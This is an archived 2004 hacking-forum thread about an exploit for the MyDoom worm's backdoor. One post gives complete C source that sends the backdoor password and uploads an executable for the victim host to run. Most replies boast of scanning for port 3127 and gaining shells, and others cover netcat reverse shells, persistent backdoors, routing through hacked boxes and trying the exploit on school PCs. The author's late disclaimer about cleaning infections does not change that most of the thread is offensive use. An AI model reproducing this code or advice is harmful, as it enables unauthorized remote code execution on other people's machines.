cant compile can u post the compiled version plz, lcc wont do it
mamep
Feb 10 2004, 12:54 AM
nice xploit
Rocky2you
Feb 10 2004, 01:02 AM
Cant compile it....whatever i try it just wont Can anybody compile that last script that spike posted ?? Would appreciate it very much Thanks felleas
m1k3
Feb 10 2004, 02:44 AM
about half of all my scans work which is good im securing them as i go along heh ;p
Major Chrome
Feb 10 2004, 02:52 AM
Why not post the errors you get, at least that way people know you are trying to compile it and might help you out.
Erra
Feb 10 2004, 04:16 AM
This is a really interesting post. I find it amusing to see the knowledgable replies and the not so.
Nice work to all involved with this one
slb33
Feb 10 2004, 05:38 AM
Very nice little appz these are
Working great, thanks
technoboy
Feb 10 2004, 06:24 AM
just tested it, work like a charm
thanks again !
Carlos
Feb 10 2004, 06:54 AM
Both methods work perfectly. Thank you sPiKie and clip for spending the time to code/modify each others code to make the exploit a bit more "user friendly", if I may, and for sharing the source.
Let's see how long those this baby last...
Alien
Feb 10 2004, 08:19 AM
here is code modified by me, compile this with lcc
CODE
/**************************************/ /* Copyrights 2004 sPiKie tha m4st3r */ /* Made to a friend */ /**************************************/ #include <stdio.h> #include <string.h> #include <winsock.h>
#pragma lib <ws2_32.lib>
int main(int argc,char *argv[]) { int sockfd, numbytes;
struct hostent *he; struct sockaddr_in their_addr; // connector's address information char doompassword[] = "\x85\x13\x3c\x9e\xa2"; //the backdoors uses a password to open CreateProcess();) char buf[1024]; int read=0; FILE *fuckfile; WSADATA wsaData; //thihihi
fuckfile = fopen(argv[3],"rb"); if (fuckfile==NULL) { printf("[-] Open Failed\n"); return -1; } printf("[+] File found ready to send\n"); if(WSAStartup(0x101,&wsaData)) { printf("[-] Unable to load winsock.\n"); return -1; } if ((he=gethostbyname(argv[1])) == NULL) { // get the host info printf("[-] GetHostByName() Error!\n"); return -1; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("[-] Can't open socket!\n"); return -1; } their_addr.sin_family = AF_INET; // host byte order their_addr.sin_port = htons(atoi(argv[2])); // port their_addr.sin_addr = *((struct in_addr *)he->h_addr); //memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) { printf("[-] Connecting error\n"); return -1; } printf("[+] Connected\n[+] Sending executable.\n"); send(sockfd,doompassword,5,0); //sending the password :) while (!feof(fuckfile)) { read = fread(buf,sizeof(char),sizeof(buf),fuckfile); if ((numbytes=send(sockfd,buf,read,0)) == -1) { printf("[-] Sending executable failed\n"); return -1; } printf("."); } printf("[+] All done, server have now executed your executable!\n"); closesocket(sockfd); WSACleanup(); return 0; }
Cow|
Feb 10 2004, 09:13 AM
Thankx for this nice exploit it works like a charm
TheOther
Feb 10 2004, 09:16 AM
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
Stephen79
Feb 10 2004, 10:08 AM
QUOTE (TheOther @ Feb 10 2004, 10:16 AM)
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
there are many ways you could go about that, the easiest it to run the command line fixer.
just look around the board and you will see its already been posted. Its not hard to find on google anyway.
clubfed
Feb 10 2004, 10:09 AM
QUOTE (TheOther @ Feb 10 2004, 09:16 AM)
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
you're kidding right? download mydoomerremove.exe to your local dir (search these forums if you don't have it) then just upload/exec *that* just like you did you trojan a few minutes ago. why not use the same interface. i've patched the *few* servers i've found. this is a dead/lame bug... hardly any infected machines at all. it was all media hype/bragging up to get money.
clubfed
Feb 10 2004, 10:11 AM
QUOTE (clubfed @ Feb 10 2004, 10:09 AM)
QUOTE (TheOther @ Feb 10 2004, 09:16 AM)
Exploit works great!!!!
Just wondering how we can patch the server through shell?
Thx
you're kidding right? download mydoomerremove.exe to your local dir (search these forums if you don't have it) then just upload/exec *that* just like you did you trojan a few minutes ago. why not use the same interface. i've patched the *few* servers i've found. this is a dead/lame bug... hardly any infected machines at all. it was all media hype/bragging up to get money.
these two commands should do it, worked for me, but i have cygwin installed and thus wget. if you don't then just go get that fix manually and save it to the same dir. you get the idea.
by the way... i posted this in another thread earlier, but basically for all the silly people begged me for the mydoom uploader (this was back in january!) that didn't just read the advisory... it was this simple (since its leaked now...)
(yes i know trigger is slightly different, but thats what i used based on disassembly of worm and it worked)
it was never any good, since the worm barely spread at all, it was totally overhyped bug and really worthless overall. consider that you can scan a class c for winxp machines and root 10 at a time using workstation service overflow, why bother with things like this?
anyway...
Yemoke
Feb 10 2004, 10:24 AM
wow i think this is a very good exploit 2 of this hosts: Transferred: 2mb.nul 2,00 MB in 2,63 (777,52 KBps)
nutschi
Feb 10 2004, 10:39 AM
lolz, finally its here and i´m late again, thx
rush
Feb 10 2004, 10:41 AM
Very good, i hope allot of kiddies get caught! I know someone who get hacked hacking a dutch university, all his pc's were taken in. He connected just once or so...
nubela
Feb 10 2004, 12:19 PM
hmm. compiled it nicely. but mydoom scanner from foundstone.com seems crap. how do u guys scan for vulnerable?
Jimbras
Feb 10 2004, 12:24 PM
Ni hack this one. Works great
Thanks for it
bambipower
Feb 10 2004, 12:36 PM
damn, people starts to send pm for the compiled version
tssss
Stephen79
Feb 10 2004, 12:43 PM
QUOTE (nubela @ Feb 10 2004, 01:19 PM)
hmm. compiled it nicely. but mydoom scanner from foundstone.com seems crap. how do u guys scan for vulnerable?
your joking right?
XpProf
Feb 10 2004, 01:11 PM
Many THX..very good exploit
Xp
Deltax
Feb 10 2004, 01:18 PM
QUOTE (nubela @ Feb 10 2004, 12:19 PM)
hmm. compiled it nicely. but mydoom scanner from foundstone.com seems crap. how do u guys scan for vulnerable?
just scan for servers with port 3127 open..
adenek
Feb 10 2004, 01:38 PM
work perfect many thx man
tolf
Feb 10 2004, 01:45 PM
yeah nice work guys.. compiles fine. Now just want to test it
Hey has anyone got the actual Mydoom virus files on hand... I wanna try this in a restricted lab area on an infected machine...
night^man
Feb 10 2004, 01:53 PM
thx got many shells
DeGast
Feb 10 2004, 01:56 PM
Thx this exploit works great! Got many shells!
x1`
Feb 10 2004, 02:12 PM
bad thing if we start securing as there will be less vunarabel servers and the exploit will die more quickly . but its good so someone esle cant hack urs , but what if the admin catchs your files how are u gonna restart servu or something , if u cant get shell any more
Homer
Feb 10 2004, 02:20 PM
just install backdoor
man many noobs here, just read up and all ur questions will be answered. It will die soon so njoy for now
sPiKie
Feb 10 2004, 02:25 PM
Thanks for all this great feedback, but one person in here that I didn't like.. I hope the admins also saw it.. Alien said he had modified my code, he didnt do ANYTHING, nothing is modified So Alien, dont try to play.. The game is over. And you lost like hell!
Or if you can say: #pragma comment (lib,"ws2_32") changing to #pragma comment (lib,"ws2_32.lib") So it works in the poor compiler lcc... So please, dont say you modified, say your modified it so it can be compiled in LCC...
XtrA
Feb 10 2004, 02:26 PM
I have a question.. hmm when i create a shell with rsCRT i should enter my ip there.. but when i connect to the internet i get another ip.. my ip number changes.. so.. is it saying that i should create new file all the time?
negyta
Feb 10 2004, 02:42 PM
@Xtra:
Yep, u alway have to change the ip in the .exe file when u have a dynamic ip
Get yourself a remote box (hacked or none-hacked ) with a static ip and hack over this box.
hulk
Feb 10 2004, 03:07 PM
has anyone been able to execute anything after you get the shell? I cant get any exe files to execute once they are on the exploited server
x1`
Feb 10 2004, 03:24 PM
which back door is best if the computer restarts and the backdoor restarts with it and not able to be found , ive just used netcat to spawn a backdoor for now
Vosgia
Feb 10 2004, 03:40 PM
do you think it belongs in this topic? Dickybob20? i don't think so
Big thanks goes to sPiKie. Very nice post but 10 pages up to now. You can see how many script kiddies were waiting for a "better" exploit than "dameware"
clip
Feb 10 2004, 05:13 PM
QUOTE (sPiKie @ Feb 10 2004, 02:25 PM)
Thanks for all this great feedback, but one person in here that I didn't like.. I hope the admins also saw it.. Alien said he had modified my code, he didnt do ANYTHING, nothing is modified So Alien, dont try to play.. The game is over. And you lost like hell!
How the hell can you say that when you balntantly ripped my code? (Although i don't care).
The command prompt has been disabled by your administrator.
execute: gpedit.msc Local Computer Policy->User Configuration->Administrative Templates->System
Under this tab there is a setting that can be used to prevent access to cmd.exe.
So in clear it mean what the message told you, cmd.exe have been disabled by the administrator. Ever heard of google btw ?
Erra
Feb 10 2004, 06:14 PM
OK now I have a question, I get this all the time...
[+] Opening File [+] File found ready to send [-] Unable to load winsock.
what the hell does that mean?
I havent seen this one asked here yet, so either, no one has had it, or, its a stupid question, but I dont know the answer to it, so any assistance would be nice thanks
sPiKie
Feb 10 2004, 06:24 PM
Erra, it means that you can't load WinSock on your computer... Hmm if you want to check it, just call WSAGetLastError(); Thats all, just try to do it on an other computer or get the newest updates/winsock etc..
ducky
Feb 10 2004, 06:47 PM
tried 5 School PC's till now...to check if it works...but no admin rights... maybe there is a need to change something in the exploit itself??
cheerz
technoboy
Feb 10 2004, 06:57 PM
the exploit work 100%, its just you guys who are not using it correctly.
f4u2t
Feb 10 2004, 07:43 PM
Heh, thx alot, i tryed this realy work ! but , IMHO, it old, becouse i scan only few 3127...
sorry for my english ;]]]
Nexcess
Feb 10 2004, 07:58 PM
well.. on the bright side you guys have successfully cleaned half the infected mydoom servers over night
liquidSilver
Feb 10 2004, 08:10 PM
6525 views on this topic - in only 1 day! 1 day!
I think it's cool that we cleaned most computers! Awesome!
Fantafour
Feb 10 2004, 08:15 PM
QUOTE (sPiKie @ Feb 9 2004, 06:15 PM)
FakoLy, I think it will goes too the /windows/system32 directory as an other name, but it will delete himself after the exploit.. The program uses the Win Function CreateProcess() ..
than, is it right, when i upload another .bat file, and he delete it automatically ?
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
now one problem in netcat it drops this ..........
CODE
C:\>nc -l -vv -p xxxx -t listening on [any] xxxx ... connect to [bla.bla.bla.bla] from res-bla-xx-bla.bla.bla.edu [xxx.x.xx.xxx] 3066 sent 0, rcvd 0
C:\>
Why do you think maybe i have no exec. rights ?
sPiKie
Feb 10 2004, 09:02 PM
By the way guys in here.. Don't use those exploits/tools on other computers that your own/or testing it with friends... And for those that didnt know that im not a blackhat, they know it now Im a 99.9999% Whitehat security coder/whatsoever. And please, I dont help to hack, I help to find the vulnerabilities so the big companies, virusscanners etc.. That they can protect the computers from getting caught.. What a good thing I did do on some friends, was this, I just uploaded the fixer via my tool and whooops MyDoom and of course the backdoor was gone. Help me clean the MyDoom's away and start DELETING the MyDoom viruses. For those that don't do this, they arent under my respect... Thanks
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Can anybody compile that last script that spike posted ?? Would appreciate it very much 
2 of this hosts: Transferred: 2mb.nul 2,00 MB in 2,63 (777,52 KBps)
now one problem in netcat it drops this ..........